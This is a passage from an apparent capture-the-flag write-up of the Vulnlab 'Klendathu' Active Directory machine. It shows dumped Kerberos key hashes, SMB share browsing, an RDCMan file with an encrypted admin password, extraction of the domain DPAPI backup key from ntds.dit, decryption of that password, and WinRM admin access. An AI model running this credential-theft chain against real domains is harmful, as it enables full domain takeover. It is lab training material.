class="line"><span class="string">SRV2$:aes256-cts-hmac-sha1-96:9568ba996762763359499e955dbb179b1e4908b38f00f2acf2736f9921386d43</span></span><br><span class="line"><span class="string">SRV2$:aes128-cts-hmac-sha1-96:18691889a9fcbde250550cbb7689c70e</span></span><br><span class="line"><span class="string">SRV2$:des-cbc-md5:bcb97316a7806bae</span></span><br><span class="line"><span class="string">RICO:aes256-cts-hmac-sha1-96:19e13ebe3cc4ebb64e213f4fa35691837dbef5fb6ebe999d9a146783897addd6</span></span><br><span class="line"><span class="string">RICO:aes128-cts-hmac-sha1-96:0f2dd3d9511b788142b8df5cedcff2ce</span></span><br><span class="line"><span class="string">RICO:des-cbc-md5:ea75576898076db3</span></span><br><span class="line"><span class="string">JENKINS:aes256-cts-hmac-sha1-96:a932dff1d29a00bd1206f285839f3e63e67479fcb252d6ee65f4d35cf0697da8</span></span><br><span class="line"><span class="string">JENKINS:aes128-cts-hmac-sha1-96:60993e1c8f2b33dfd1890383c2649136</span></span><br><span class="line"><span class="string">JENKINS:des-cbc-md5:7c6eb9380d5d43fe</span></span><br><span class="line"><span class="string">IBANEZ:aes256-cts-hmac-sha1-96:1dc0e0fad69945b155e3cf375344e5ace78fda5ba3e8fb93c667c767885e8de4</span></span><br><span class="line"><span class="string">IBANEZ:aes128-cts-hmac-sha1-96:44bee46af8142e6a0abc69ba2637dd39</span></span><br><span class="line"><span class="string">IBANEZ:des-cbc-md5:1a54d0adb6975ee3</span></span><br><span class="line"><span class="string">ZIM:aes256-cts-hmac-sha1-96:06d8f45c04be95f30cf3a5dcb523dbaa5d2b11e7ea73a78818e52ec06d9c5609</span></span><br><span class="line"><span class="string">ZIM:aes128-cts-hmac-sha1-96:71392f6160bae82bdbc66072cb908f09</span></span><br><span class="line"><span class="string">ZIM:des-cbc-md5:e9a7aea1d632b02a</span></span><br><span class="line"><span class="string">DELADRIER:aes256-cts-hmac-sha1-96:1a98dd205f6261423980cce26c4d4f416c8c9e888118a56b27550f5feb4b0e7d</span></span><br><span class="line"><span class="string">DELADRIER:aes128-cts-hmac-sha1-96:bf53a3ac8eb78dc854d19b9bdb6f4632</span></span><br><span class="line"><span class="string">DELADRIER:des-cbc-md5:e9c4c4d94a9267a1</span></span><br><span class="line"><span class="string">ALPHARD:aes256-cts-hmac-sha1-96:b0cd5cdb03b72b622c4c001fb4b182d7fc6fa7682b2ac734c8bdcf8322f8182f</span></span><br><span class="line"><span class="string">ALPHARD:aes128-cts-hmac-sha1-96:054564c213624923ad620b7b57a8fe12</span></span><br><span class="line"><span class="string">ALPHARD:des-cbc-md5:dff1855b7943bc6e</span></span><br><span class="line"><span class="string">LEIVY:aes256-cts-hmac-sha1-96:b6109cfd045732e7cf301af5e01c4aec4b7fb8124fde94b6c7fed93f5521a8aa</span></span><br><span class="line"><span class="string">LEIVY:aes128-cts-hmac-sha1-96:d3dcfcb7f88bc5b1422ccacdb2f85445</span></span><br><span class="line"><span class="string">LEIVY:des-cbc-md5:31139efb51977032</span></span><br><span class="line"><span class="string">FRANKEL:aes256-cts-hmac-sha1-96:d452d169b1335e20c1b04ba9ff8b2032354647ca4f9abc6c8ce52836157a61bf</span></span><br><span class="line"><span class="string">FRANKEL:aes128-cts-hmac-sha1-96:7ebecbd3269b3e1abc0d398d6bedfc69</span></span><br><span class="line"><span class="string">FRANKEL:des-cbc-md5:5be543b34f6489b6</span></span><br><span class="line"><span class="string">HENDRICK:aes256-cts-hmac-sha1-96:7ad7d2569f4961e97e4918d593617d3843d40e5f6d612b957c74211d34914df7</span></span><br><span class="line"><span class="string">HENDRICK:aes128-cts-hmac-sha1-96:7064283cbd3a954f923a69103072c753</span></span><br><span class="line"><span class="string">HENDRICK:des-cbc-md5:abd5589179c88549</span></span><br><span class="line"><span class="string">PATERSON:aes256-cts-hmac-sha1-96:b104e9b4414ca50b5059375f1a4393f6b79bd072dd1d77f4884a1153c1bc24fe</span></span><br><span class="line"><span class="string">PATERSON:aes128-cts-hmac-sha1-96:389567d5f33522316502884abae08846</span></span><br><span class="line"><span class="string">PATERSON:des-cbc-md5:26f1cba8316e1cd6</span></span><br><span class="line"><span class="string">AZUMA:aes256-cts-hmac-sha1-96:561f3c03f5d73b9fb72487b642f78693041340fa36afc83d8b2ca85a0b60fde9</span></span><br><span class="line"><span class="string">AZUMA:aes128-cts-hmac-sha1-96:224fc5c985f1782a5a2c08172e57430f</span></span><br><span class="line"><span class="string">AZUMA:des-cbc-md5:3dcee923eabfcb08</span></span><br><span class="line"><span class="string">CHERENKOV:aes256-cts-hmac-sha1-96:b44af815fad3949323783d07cf2eb2a3919f4c2186c9450f5203d0f7c62a4aaa</span></span><br><span class="line"><span class="string">CHERENKOV:aes128-cts-hmac-sha1-96:bae5329f1e3a967be53f218fad30fb7a</span></span><br><span class="line"><span class="string">CHERENKOV:des-cbc-md5:3d20fe4cc12a8979</span></span><br><span class="line"><span class="string">CLEA:aes256-cts-hmac-sha1-96:ae36bdce6ad3d42e7262a37dbbe061f1fc2b702ffb3c044a76718b8f11275c60</span></span><br><span class="line"><span class="string">CLEA:aes128-cts-hmac-sha1-96:79aef3e21a2722a8b093f8f6d60e5cff</span></span><br><span class="line"><span class="string">CLEA:des-cbc-md5:7ce05894e5d0ec31</span></span><br><span class="line"><span class="string">DUNN:aes256-cts-hmac-sha1-96:447e167135fc89077065586785d79a841b127412219ef6df88273a391d24497b</span></span><br><span class="line"><span class="string">DUNN:aes128-cts-hmac-sha1-96:d2122ed31f73a918cc4a8c1573c23d60</span></span><br><span class="line"><span class="string">DUNN:des-cbc-md5:52b615c43e542f83</span></span><br><span class="line"><span class="string">FLORES:aes256-cts-hmac-sha1-96:a96a69789edb11607e816931107643bb3d0c8fdd8418a36cc6a60ca631d47059</span></span><br><span class="line"><span class="string">FLORES:aes128-cts-hmac-sha1-96:bf7fe3374a43ba76bcfa6aebb4185f49</span></span><br><span class="line"><span class="string">FLORES:des-cbc-md5:5de51af1f7a862f8</span></span><br><span class="line"><span class="string">SHUJUMI:aes256-cts-hmac-sha1-96:7cbfa3f031635737b46e63b9fd46ab5b953712fae06c3ba9da44179fe8f5af91</span></span><br><span class="line"><span class="string">SHUJUMI:aes128-cts-hmac-sha1-96:7d447e3190a7bfd7943940605eacccde</span></span><br><span class="line"><span class="string">SHUJUMI:des-cbc-md5:f7d9fb022cfe20e3</span></span><br><span class="line"><span class="string">BARCALOW:aes256-cts-hmac-sha1-96:b87873224b7bc332fa3ee8d55e8583c967d3eed8889d18d2b4983806e2f0ddf6</span></span><br><span class="line"><span class="string">BARCALOW:aes128-cts-hmac-sha1-96:978b186295fcb24f1f79056a7cd7b393</span></span><br><span class="line"><span class="string">BARCALOW:des-cbc-md5:f2576298cd26abd6</span></span><br><span class="line"><span class="string">BRECKENRIDGE:aes256-cts-hmac-sha1-96:b9b5b305d1308cfccb01ec4fa9dcbc3ae535bbea6df9315172d2b16b5983230b</span></span><br><span class="line"><span class="string">BRECKENRIDGE:aes128-cts-hmac-sha1-96:f7b8776004cab2d9d87a59b06e72d8f3</span></span><br><span class="line"><span class="string">BRECKENRIDGE:des-cbc-md5:0e70aba26e0d8970</span></span><br><span class="line"><span class="string">BYRD:aes256-cts-hmac-sha1-96:c72740f4062c0d278672f83208c4ea968952788d777ef1ff521191b002877eb8</span></span><br><span class="line"><span class="string">BYRD:aes128-cts-hmac-sha1-96:c9b138818a5074cf2d21bc6dc535af53</span></span><br><span class="line"><span class="string">BYRD:des-cbc-md5:43e5dcd98357d37f</span></span><br><span class="line"><span class="string">MCINTHIRE:aes256-cts-hmac-sha1-96:8a562970eb9d4d61cebd0660be98813d7b9475436b657cec81a11ead0cdaa7bd</span></span><br><span class="line"><span class="string">MCINTHIRE:aes128-cts-hmac-sha1-96:c4b11b0ec508058089667592d840bdba</span></span><br><span class="line"><span class="string">MCINTHIRE:des-cbc-md5:1904da7c8394efc1</span></span><br><span class="line"><span class="string">RASCZAK:aes256-cts-hmac-sha1-96:9cb70d524f79237faffcfcab7856855b510af1d31ef6b0a88745b5f0a403ff50</span></span><br><span class="line"><span class="string">RASCZAK:aes128-cts-hmac-sha1-96:1e3c16a9a3b29507fc402e0a61f96b2f</span></span><br><span class="line"><span class="string">RASCZAK:des-cbc-md5:d91ab601e5a268ea</span></span><br><span class="line"><span class="string">svc_backup:aes256-cts-hmac-sha1-96:df3aa62f1f753e1770bc486c35539ebb1f306bf676075807d362c52264f25697</span></span><br><span class="line"><span class="string">svc_backup:aes128-cts-hmac-sha1-96:79f83c30ad12843187d02d1e154ff6f7</span></span><br><span class="line"><span class="string">svc_backup:des-cbc-md5:49c4e952c7ec98a1</span></span><br><span class="line"><span class="string">[*] Cleaning up... </span></span><br><span class="line"><span class="string">➜  inc5543_domaincontroller_backup </span></span><br></pre></td></tr></table></figure></div><p>We also got a note from that zip:</p><div class="code-container" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">➜  inc5543_domaincontroller_backup <span class="built_in">ls</span></span><br><span class="line"><span class="string">&#x27;Active Directory&#x27;</span>   note.txt   registry</span><br><span class="line">➜  inc5543_domaincontroller_backup <span class="built_in">cat</span> note.txt                      </span><br><span class="line">Incident: INC5543</span><br><span class="line"></span><br><span class="line">I<span class="string">&#x27;ve included a backup of the domain controller before resetting all passwords after the last breach</span></span><br></pre></td></tr></table></figure></div><p>Since its old passwords before data breach we wont be able to use it for anything.<br>Using the <code>impacket-smbclient</code>, we initiated a connection to the domain controller (DC1.klendathu.vl) with the Kerberos ticket.</p><div class="code-container" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br></pre></td><td class="code"><pre><span class="line">➜  srv2 impacket-smbclient -k DC1.klendathu.vl                           </span><br><span class="line">Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies </span><br><span class="line"></span><br><span class="line">Type <span class="built_in">help</span> <span class="keyword">for</span> list of commands</span><br><span class="line"><span class="comment"># shares</span></span><br><span class="line">ADMIN$</span><br><span class="line">C$</span><br><span class="line">HomeDirs</span><br><span class="line">IPC$</span><br><span class="line">NETLOGON</span><br><span class="line">SYSVOL</span><br><span class="line"><span class="comment"># cd HomeDirs</span></span><br><span class="line">[-] No share selected</span><br><span class="line"><span class="comment"># use HomeDirs</span></span><br><span class="line"><span class="comment"># ls</span></span><br><span class="line">drw-rw-rw-          0  Wed Apr 10 20:58:10 2024 .</span><br><span class="line">drw-rw-rw-          0  Mon Apr 15 12:09:19 2024 ..</span><br><span class="line">drw-rw-rw-          0  Fri Apr 12 00:07:56 2024 CLEA</span><br><span class="line">drw-rw-rw-          0  Fri Apr 12 00:08:12 2024 DUNN</span><br><span class="line">drw-rw-rw-          0  Fri Apr 12 21:32:21 2024 JENKINS</span><br><span class="line">drw-rw-rw-          0  Fri Apr 12 00:08:59 2024 SHUJUMI</span><br><span class="line"><span class="comment"># cd clea</span></span><br><span class="line"><span class="comment"># ls</span></span><br><span class="line">drw-rw-rw-          0  Fri Apr 12 00:07:56 2024 .</span><br><span class="line">drw-rw-rw-          0  Wed Apr 10 20:58:10 2024 ..</span><br><span class="line"><span class="comment"># cd ../dunn</span></span><br><span class="line"><span class="comment"># ls</span></span><br><span class="line">drw-rw-rw-          0  Fri Apr 12 00:08:12 2024 .</span><br><span class="line">drw-rw-rw-          0  Wed Apr 10 20:58:10 2024 ..</span><br><span class="line"><span class="comment"># cd ../jenkins</span></span><br><span class="line"><span class="comment"># ls</span></span><br><span class="line">drw-rw-rw-          0  Fri Apr 12 21:32:21 2024 .</span><br><span class="line">drw-rw-rw-          0  Wed Apr 10 20:58:10 2024 ..</span><br><span class="line">-rw-rw-rw-     101234  Fri Apr 12 21:32:11 2024 AppData_Roaming_Backup.zip</span><br><span class="line">-rw-rw-rw-       1077  Fri Apr 12 00:08:35 2024 jenkins.rdg</span><br><span class="line"><span class="comment"># get AppData_Roaming_Backup.zip</span></span><br><span class="line"><span class="comment"># cd ../shujumi</span></span><br><span class="line"><span class="comment"># ls</span></span><br><span class="line">drw-rw-rw-          0  Fri Apr 12 00:08:59 2024 .</span><br><span class="line">drw-rw-rw-          0  Wed Apr 10 20:58:10 2024 ..</span><br><span class="line"><span class="comment"># </span></span><br></pre></td></tr></table></figure></div><div class="code-container" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br></pre></td><td class="code"><pre><span class="line">➜  srv2 <span class="built_in">cat</span> jenkins.rdg</span><br><span class="line">&lt;?xml version=<span class="string">&quot;1.0&quot;</span> encoding=<span class="string">&quot;utf-8&quot;</span>?&gt;</span><br><span class="line">&lt;RDCMan programVersion=<span class="string">&quot;2.93&quot;</span> schemaVersion=<span class="string">&quot;3&quot;</span>&gt;</span><br><span class="line">  &lt;file&gt;</span><br><span class="line">    &lt;credentialsProfiles&gt;</span><br><span class="line">      &lt;credentialsProfile inherit=<span class="string">&quot;None&quot;</span>&gt;</span><br><span class="line">        &lt;profileName scope=<span class="string">&quot;Local&quot;</span>&gt;KLENDATHU\administrator&lt;/profileName&gt;</span><br><span class="line">        &lt;userName&gt;administrator&lt;/userName&gt;</span><br><span class="line">        &lt;password&gt;AQAAANCMnd8BFdERjHoAwE/Cl+sBAAAABS0Gmx4U2k+bLUYfRpOl6wAAAAACAAAAAAADZgAAwAAAABAAAAAqvWFuXTLeCWvFNnkKjNDcAAAAAASAAACgAAAAEAAAAHHnv4NI9rTi06sCfSEy5hsoAAAAtCdIUjQfzQiJj363pO1RW/XSIlS/pMf/DBn3EHb8xEha6u1f/CMguhQAAACVsld41QgTZXMtLDfgrswQaShAxQ==&lt;/password&gt;</span><br><span class="line">        &lt;domain&gt;KLENDATHU&lt;/domain&gt;</span><br><span class="line">      &lt;/credentialsProfile&gt;</span><br><span class="line">    &lt;/credentialsProfiles&gt;</span><br><span class="line">    &lt;properties&gt;</span><br><span class="line">      &lt;expanded&gt;True&lt;/expanded&gt;</span><br><span class="line">      &lt;name&gt;jenkins&lt;/name&gt;</span><br><span class="line">    &lt;/properties&gt;</span><br><span class="line">    &lt;server&gt;</span><br><span class="line">      &lt;properties&gt;</span><br><span class="line">        &lt;name&gt;dc1.klendathu.vl&lt;/name&gt;</span><br><span class="line">      &lt;/properties&gt;</span><br><span class="line">      &lt;logonCredentials inherit=<span class="string">&quot;None&quot;</span>&gt;</span><br><span class="line">        &lt;profileName scope=<span class="string">&quot;File&quot;</span>&gt;KLENDATHU\administrator&lt;/profileName&gt;</span><br><span class="line">      &lt;/logonCredentials&gt;</span><br><span class="line">    &lt;/server&gt;</span><br><span class="line">  &lt;/file&gt;</span><br><span class="line">  &lt;connected /&gt;</span><br><span class="line">  &lt;favorites /&gt;</span><br><span class="line">  &lt;recentlyUsed /&gt;</span><br><span class="line">&lt;/RDCMan&gt;</span><br></pre></td></tr></table></figure></div><p>Ntdissector is a powerful tool designed to parse records from an NTDS database, allowing users to extract data in JSON format and filter it by object class; importantly, by supplying the SYSTEM hive or the appropriate boot key in hex format, it can strip away encryption layers from specific columns, highlighting the crucial point that even if a company rotates all its passwords, the domain backup key remains constant.</p><p>We used Ntdissector to parse the NTDS database and extract the PVK key.</p><div class="code-container" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">➜  ntdissector git:(main) ntdissector  -ntds ../../inc5543_domaincontroller_backup/Active\ Directory/ntds.dit -system ../../inc5543_domaincontroller_backup/registry/SYSTEM -ts -f all</span><br><span class="line">[2024-11-01 15:28:57] [*] PEK <span class="comment"># 0 found and decrypted: feab48d5655b005f0fed603c166c587f</span></span><br><span class="line">[2024-11-01 15:28:57] [*] Filtering records with this list of object classes :  [<span class="string">&#x27;all&#x27;</span>]</span><br><span class="line">[2024-11-01 15:28:57] [*] Ignoring records marked as deleted</span><br><span class="line">100%|██████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████| 3747/3747 [00:01&lt;00:00, 3730.75rec./s]</span><br><span class="line">[2024-11-01 15:28:58] [*] Finished, matched 3708 records out of 3747</span><br><span class="line">[2024-11-01 15:28:58] [*] Processing 3708 serialization tasks</span><br><span class="line">100%|███████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████| 3708/3708 [00:04&lt;00:00, 491.16rec./s]</span><br><span class="line">➜  ntdissector git:(main) </span><br></pre></td></tr></table></figure></div><p>Output of this command will be in <code>~/.ntdissector/out/&lt;hash&gt;</code></p><div class="code-container" data-rel="Shell"><figure class="iseeu highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><span class="line">➜  dpapilab-ng git:(main) ✗ cd ~/.ntdissector/           </span><br><span class="line">➜  .ntdissector ls</span><br><span class="line">out</span><br><span class="line">➜  .ntdissector cd out            </span><br><span class="line">➜  out ls              </span><br><span class="line">21f4c3bcfbe9fe4bcefed33796b683a4</span><br><span class="line">➜  out cd 21f4c3bcfbe9fe4bcefed33796b683a4 </span><br><span class="line">➜  21f4c3bcfbe9fe4bcefed33796b683a4 ls</span><br><span class="line">attributeSchema.json     dnsNode.json                      ipsecISAKMPPolicy.json              msDFSR-Member.json                      msDS-QuotaContainer.json                nTDSService.json                   serversContainer.json</span><br><span class="line">builtinDomain.json       dnsZone.json                      ipsecNegotiationPolicy.json         msDFSR-ReplicationGroup.json            msDS-ResourceProperties.json            nTDSSiteSettings.json              site.json</span><br><span class="line">classSchema.json         domainDNS.json                    ipsecNFA.json                       msDFSR-Subscriber.json                  msDS-ResourceProperty.json              nTFRSSettings.json                 siteLink.json</span><br><span class="line">classStore.json          domainPolicy.json                 ipsecPolicy.json                    msDFSR-Subscription.json                msDS-ResourcePropertyList.json          organizationalUnit.json            sitesContainer.json</span><br><span class="line">computer.json            dSUISettings.json                 linkTrackObjectMoveTable.json       msDFSR-Topology.json                    msDS-ShadowPrincipalContainer.json      physicalLocation.json              subnetContainer.json</span><br><span class="line">configuration.json       fileLinkTracking.json             linkTrackVolumeTable.json           msDNS-ServerSettings.json               msDS-ValueType.json                     queryPolicy.json                   subSchema.json</span><br><span class="line">container.json           foreignSecurityPrincipal.json     lostAndFound.json                   msDS-AuthNPolicies.json                 msImaging-PSPs.json                     rIDManager.json                    top.json</span><br><span class="line">controlAccessRight.json  group.json                        msAuthz-CentralAccessPolicies.json  msDS-AuthNPolicySilos.json              msKds-ProvServerConfiguration.json      rIDSet.json                        user.json</span><br><span class="line">crossRefContainer.json   groupPolicyContainer.json         msAuthz-CentralAccessRules.json     msDS-ClaimsTransformationPolicies.json  mSMQEnterpriseSettings.json             rpcContainer.json</span><br><span class="line">crossRef.json            infrastructureUpdate.json         msDFSR-Content.json                 msDS-ClaimType.json                     msPKI-Enterprise-Oid.json               rRASAdministrationDictionary.json</span><br><span class="line">dfsConfiguration.json    interSiteTransportContainer.json  msDFSR-ContentSet.json              msDS-ClaimTypes.json                    msSPP-ActivationObjectsContainer.json   samServer.json</span><br><span class="line">displaySpecifier.json    interSiteTransport.json           msDFSR-GlobalSettings.json          msDS-OptionalFeature.json               msTPM-InformationObjectsContainer.json  secret.json</span><br><span class="line">dMD.json                 ipsecFilter.json                  msDFSR-LocalSettings.json           msDS-PasswordSettingsContainer.json     nTDSDSA.json                            server.json </span><br><span class="line">➜  21f4c3bcfbe9fe4bcefed33796b683a4 jq &#x27;.currentValue.pvk&#x27; secret.json</span><br><span class="line">null</span><br><span class="line">&quot;HvG1sAAAAAABAAAAAAAAAAAAAACUBAAABwIAAACkAABSU0EyAAgAAAEAAQDVohzlRlC5PF0oLzwI/dqKTjs18hMm8ICG0Dhib5UBo7ukmgYEjqP7sINEvyuEPxTNPkDlqHGunnK2/pi4Ydc8mz7vHSB6xquC4gugjl01EnoROGb3u/hbsv72HJT9BmUa1lwp1ZyCzG9zksKSktAflfzzqYUYvc9IyApB8uItxxJc6vvrXnPipJy5ZBvbDByF9h8eX7NqV7CNoy4dYHkr54LsRofz/b2aHUc+391Ol1XBN719MhnZ0TUWPbuKHn3jblarSUd8oIW+iXrFPoyocFyHxAuDUQ07KVsRdOTtP8b5w2DB1Rcidj1BTSJjwqjVdoHlr5jxTwDQn16lJyDFq9Hc6+7rS04fpyboz6pt0TlAcfR0Ip8t/MIxMqDHjvCE9b8XDOHNcgNX077vWFKXkzBpPe+hjcP7+pENHgZOP799aVs7cA+fxBx6yvHF4Hr9em8dAOQJ9dkfa9WtPpFlOo+g4asHq4TmHeJGPEEssyjy+YfFWI4J/un+ky5AquB/3bBUknkqC7UAvjkkl6SkM7+237vzgWloQbGljr303CcZAlx0HhnRdz/yIUDqJOmO1mWtqbGrPLuPOP6BwX8Y26FCPxs7b8dgjlf64P3BeLCw03pRyzvdQnRQsGgiKulK3jKI63pjnYfqcvjezi0uz+PNcuLbP+TOp6MqKJme4JGsyw3fEV/pwuNhsRrAdPFJdMz2NPlTPMTTok/2oOTAKjc8OJeMHN6g5R3VWtdxl8jRM+7M1CvMJsGALLquT0dipS77lOJprVd51PVJCFKHkBo0m1MXnGqNojcVKgnzLQ3tHE6k/edMjFiW72gqiKmCxdaqim6HlSy+0LKJn22N0cqKfB9zsnJTjhdDCdyTV5OQPlCP2w53mxnZmz2H+fyTNEk639k2457DwZJ+oLuGeq5fymKDPA8TMAddoD6GF55LCoeA+1UFhK/TMuThd4cWCXLQfO290BStmSYUP4JnWPXjnwDFsisUoLOlMszH/OpRGsgCYd4FIGlBjDzojMF8GVoopk/rk9nqnRpkvjz6vCKgEvSLba3qJQUnmrG7fM+VO6SS1kiHBMOVJphepxDzrTGfu83FBVnE3OSUzAmKe76FEg4KdDfhLR/PY8toiLOL3g6Wnwm38n/C+GC8xe4rVPqozXaRVs+kZ5bkiEMRiYymcnyuf/f3lkdS6Gy1Cykyq8WOs22z1yGlvlfWEAtMHgbDBzneqXGNsOFWCD6OEihoHZHNAFOSSEbGJNuLrXLNkPGiQYiVlq+J7S7t+oYriZcYF/WtqYmj4gV2QJXEBjwVkU2UwZXtwD6EIirqxkQcFVsuYwhfD/iM64LKD3hgm1kiyxSvLGO7AJ/gOJSDP3Rzqz3W4iE9csaJ1EzzKSCuEDWOgyH/iFW1th6SSNexkepgAyjBH6qx5MUwfaciE6VZUUwD6oj8mHk70fxqWVvyDKnnFult2xnTcDHMZlbIn35xT5E0KB0MYcmPwBQK3nsbBAzycoDGdWbwvCisA3OR0YcQ4JuS1vPT6wMuzV4=&quot;</span><br></pre></td></tr></table></figure></div><p>We obtained the private key using <a class="link"   href="https://github.com/synacktiv/ntdissector" >ntdissector<i class="fa-solid fa-arrow-up-right ml-[0.2em] font-light align-text-top text-[0.7em] link-icon"></i></a>, which allowed us to extract the necessary PVK. With this private key in hand, we utilized the <a class="link"   href="https://github.com/tijldeneut/dpapilab-ng/blob/main/rdgdec.py" >rdgdec.py<i class="fa-solid fa-arrow-up-right ml-[0.2em] font-light align-text-top text-[0.7em] link-icon"></i></a> script to decrypt the jenkins.rdg file using the acquired master key and the PVK.</p><h4 id="Decrypting-rdg-password"><a href="#Decrypting-rdg-password" class="headerlink" title="Decrypting rdg password"></a>Decrypting rdg password</h4><div class="code-container" data-rel="Shell"><figure class="iseeu highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">➜  cat b64.key | base64 -d &gt; priv.pvk</span><br><span class="line">➜  dpapilab-ng git:(main) ✗ python3 rdgdec.py --masterkey ../Roaming/Microsoft/Protect/S-1-5-21-641890747-1618203462-755025521-1110/ ../jenkins.rdg  --pvk=priv.pvk</span><br><span class="line">[+] Detected SID: S-1-5-21-641890747-1618203462-755025521-1110</span><br><span class="line">[+] Profile:  KLENDATHU\administrator</span><br><span class="line">    Username: administrator</span><br><span class="line">    Domain:   KLENDATHU</span><br><span class="line">    Password: [............]</span><br><span class="line">-------------------------------------------------------------------------------</span><br><span class="line">[+] Decrypted 1 out of 1 credentials</span><br><span class="line">➜  dpapilab-ng git:(main) ✗ </span><br></pre></td></tr></table></figure></div><div class="code-container" data-rel="Shell"><figure class="iseeu highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br></pre></td><td class="code"><pre><span class="line">➜  Machines nxc winrm 10.10.243.165 -u Administrator -p [...]</span><br><span class="line">WINRM       10.10.243.165   5985   DC1              [*] Windows Server 2022 Build 20348 (name:DC1) (domain:KLENDATHU.VL)</span><br><span class="line">WINRM       10.10.243.165   5985   DC1              [+] KLENDATHU.VL\Administrator:[...] (Pwn3d!)</span><br><span class="line">➜  Machines evil-winrm -i 10.10.243.165 -u Administrator -p [...]</span><br><span class="line">                                        </span><br><span class="line">Evil-WinRM shell v3.7</span><br><span class="line">                                        </span><br><span class="line">Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine</span><br><span class="line">                                        </span><br><span class="line">Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion</span><br><span class="line">                                        </span><br><span class="line">Info: Establishing connection to remote endpoint</span><br><span class="line">*Evil-WinRM* PS C:\Users\Administrator\Documents&gt; whoami</span><br><span class="line">klendathu\administrator</span><br><span class="line">*Evil-WinRM* PS C:\Users\Administrator\Documents&gt; hostname</span><br><span class="line">DC1</span><br><span class="line">*Evil-WinRM* PS C:\Users\Administrator\Documents&gt; cd ../Desktop</span><br><span class="line">*Evil-WinRM* PS C:\Users\Administrator\Desktop&gt; dir</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">    Directory: C:\Users\Administrator\Desktop</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">Mode                 LastWriteTime         Length Name</span><br><span class="line">----                 -------------         ------ ----</span><br><span class="line">-a----         4/20/2024   7:50 AM             36 root.txt</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">*Evil-WinRM* PS C:\Users\Administrator\Desktop&gt; </span><br></pre></td></tr></table></figure></div><p>And we got out final flag and compromised whole DC.</p>]]></content>
    
    
      
      
    <summary type="html">&lt;link rel=&quot;stylesheet&quot; class=&quot;aplayer-secondary-style-marker&quot; href=&quot;/assets/css/APlayer.min.css&quot;&gt;&lt;script src=&quot;/assets/js/APlayer.min.js&quot; cla</summary>
      
    
    
    
    <category term="Vulnlab" scheme="http://example.com/categories/Vulnlab/"/>
    
    
    <category term="Security" scheme="http://example.com/tags/Security/"/>
    
    <category term="Active Directory" scheme="http://example.com/tags/Active-Directory/"/>
    
    <category term="Impacket" scheme="http://example.com/tags/Impacket/"/>
    
